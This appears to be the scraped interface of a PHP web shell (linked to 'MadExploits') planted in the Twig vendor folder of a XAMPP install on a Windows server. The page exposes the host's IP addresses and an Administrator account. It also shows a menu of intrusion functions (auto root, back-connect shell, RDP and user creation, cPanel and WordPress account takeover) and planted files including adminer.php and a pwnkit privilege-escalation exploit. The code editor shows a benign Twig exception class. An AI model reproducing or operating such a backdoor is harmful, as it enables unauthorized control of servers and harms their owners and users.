Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
vendor /
twig /
twig /
src /
Sandbox /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
SecurityError.php
409
B
-rw-rw-rw-
SecurityNotAllowedFilterError....
707
B
-rw-rw-rw-
SecurityNotAllowedFunctionErro...
719
B
-rw-rw-rw-
SecurityNotAllowedMethodError....
868
B
-rw-rw-rw-
SecurityNotAllowedPropertyErro...
884
B
-rw-rw-rw-
SecurityNotAllowedTagError.php
679
B
-rw-rw-rw-
SecurityPolicy.php
3.92
KB
-rw-rw-rw-
SecurityPolicyInterface.php
983
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SecurityNotAllowedTagError.php
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Twig\Sandbox; /** * Exception thrown when a not allowed tag is used in a template. * * @author Martin HasoĊ <martin.hason@gmail.com> */ final class SecurityNotAllowedTagError extends SecurityError { private $tagName; public function __construct(string $message, string $tagName) { parent::__construct($message); $this->tagName = $tagName; } public function getTagName(): string { return $this->tagName; } }
Close